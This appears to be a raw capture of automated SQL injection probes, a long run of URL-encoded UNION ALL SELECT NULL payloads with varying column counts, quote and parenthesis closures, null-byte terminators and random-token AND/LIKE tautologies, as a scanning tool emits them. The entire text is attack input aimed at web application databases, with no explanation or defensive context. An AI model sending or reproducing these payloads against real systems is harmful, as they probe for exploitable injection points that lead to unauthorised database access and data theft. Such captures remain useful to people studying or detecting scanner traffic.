1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%286054%3D6054 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%286397%3D6397 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27aXrj%27%3D%27aXrj 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27fdZs%27%3D%27fdZs 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27hhZy%27%3D%27hhZy 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27HFky%27%3D%27HFky 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27ySUz%27%3D%27ySUz 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27rgwi%27%3D%27rgwi 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27hEOw%27%3D%27hEOw 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27AqMX%27%3D%27AqMX 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27jTeI%27%3D%27jTeI 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27yEJo%27%3D%27yEJo 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27dxKR%27%3D%27dxKR 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27WeKR%27%3D%27WeKR 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27wHbE%27%3D%27wHbE 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27RNQH%27%3D%27RNQH 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27RtxW%27%3D%27RtxW 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27JVyV%27%3D%27JVyV 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27HhyI%27%3D%27HhyI 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27VIwf%27%3D%27VIwf 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27tCFy%27%3D%27tCFy 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27JKPh%27%3D%27JKPh 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27ofCV%27%3D%27ofCV 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27ExVm%27%3D%27ExVm 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27qUlg%27%3D%27qUlg 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27casg%27%3D%27casg 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27KYyd%27%3D%27KYyd 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27ELMN%27%3D%27ELMN 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27kNkE%27%3D%27kNkE 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27fGdi%27%3D%27fGdi 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27PynJ%27%3D%27PynJ 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27fqAH%27%3D%27fqAH 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27uoTi%27%3D%27uoTi 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27uOUN%27%3D%27uOUN 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27hbmj%27%3D%27hbmj 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27OHSt%27%3D%27OHSt 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27qQdb%27%3D%27qQdb 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27iDDu%27%3D%27iDDu 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27whQv%27%3D%27whQv 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27pFhZ%27%3D%27pFhZ 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27pxDf%27%3D%27pxDf 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27RHuf%27%3D%27RHuf 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27thOi%27%20LIKE%20%27thOi 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27fsdV%27%20LIKE%20%27fsdV 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27KEAm%27%20LIKE%20%27KEAm 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27OQYg%27%20LIKE%20%27OQYg 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27bpxq%27%20LIKE%20%27bpxq 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27wkcu%27%20LIKE%20%27wkcu 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27SIwu%27%20LIKE%20%27SIwu 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27vCZi%27%20LIKE%20%27vCZi 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27gkSw%27%20LIKE%20%27gkSw 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27Jesd%27%20LIKE%20%27Jesd 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27PLXx%27%20LIKE%20%27PLXx 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27hFGN%27%20LIKE%20%27hFGN 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27tJgh%27%20LIKE%20%27tJgh 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27TDpX%27%20LIKE%20%27TDpX 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27pGUF%27%20LIKE%20%27pGUF 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27QKxV%27%20LIKE%20%27QKxV 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27IfuB%27%20LIKE%20%27IfuB 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27FkJX%27%20LIKE%20%27FkJX 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27HyRn%27%20LIKE%20%27HyRn 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27JfWr%27%20LIKE%20%27JfWr 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27uECh%27%20LIKE%20%27uECh 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27cYBw%27%20LIKE%20%27cYBw 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27VCbT%27%20LIKE%20%27VCbT 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27fzRO%27%20LIKE%20%27fzRO 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27nnbw%27%20LIKE%20%27nnbw 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27qroO%27%20LIKE%20%27qroO 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27MMDF%27%20LIKE%20%27MMDF 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27aKTc%27%20LIKE%20%27aKTc 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27jIeo%27%20LIKE%20%27jIeo 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27LFrc%27%20LIKE%20%27LFrc 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Xzxr%27%20LIKE%20%27Xzxr 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27usbd%27%20LIKE%20%27usbd 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27huPu%27%20LIKE%20%27huPu 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27nIeN%27%20LIKE%20%27nIeN 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27tRtN%27%20LIKE%20%27tRtN 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27CPgg%27%20LIKE%20%27CPgg 